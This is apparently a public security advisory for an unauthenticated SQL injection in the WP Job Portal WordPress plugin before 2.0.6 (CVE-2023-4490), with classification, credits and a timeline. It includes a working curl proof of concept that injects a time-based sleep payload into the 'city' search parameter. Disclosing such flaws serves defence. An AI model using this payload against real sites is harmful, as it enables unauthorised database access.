WordPress Plugin Vulnerabilities

WP Job Portal < 2.0.6 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

Setup (as admin): Create a dummy company and a job (if there are none)

Attack (as unauthenticated):
time curl -X POST --data 'jobtitle=a&city=(select*from(select(sleep(10)))a)&wpjobportallay=jobs&WPJOBPORTAL_form_search=WPJOBPORTAL_SEARCH' https://example.com/wp-job-portal-jobseeker-controlpanel/jobs/

and notice the 10s delay of the response

Affects Plugins

Plugin icon
wp-job-portal
Fixed in 2.0.6

References

CVE
CVE-2023-4490

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Pablo Sanchez
Submitter
Pablo Sanchez
Verified
Yes
WPVDB ID
986024f0-3c8d-44d8-a9c9-1dd284d7db0d

Timeline

Publicly Published
2023-08-30 (about 8 months ago)
Added
2023-08-30 (about 8 months ago)
Last Updated
2023-10-18 (about 6 months ago)

Other

Published
Title
Published
2021-08-22
Title
WP-Board <= 1.1 (beta) - Unauthenticated SQL Injection
Published
2023-10-03
Title
Video Gallery – YouTube Gallery < 2.2.6 - Admin+ SQLi
Published
2024-03-21
Title
Easy Property Listings < 3.5.3 - Authenticated(Contributor+) SQL Injection via Shortcode
Published
2023-01-20
Title
RapidLoad Power-Up for Autoptimize < 1.6.36 - Subscriber+ SQLi
Published
2014-08-01
Title
Editorial Calendar 2.6 - Post Query Multiple Filter SQL Injection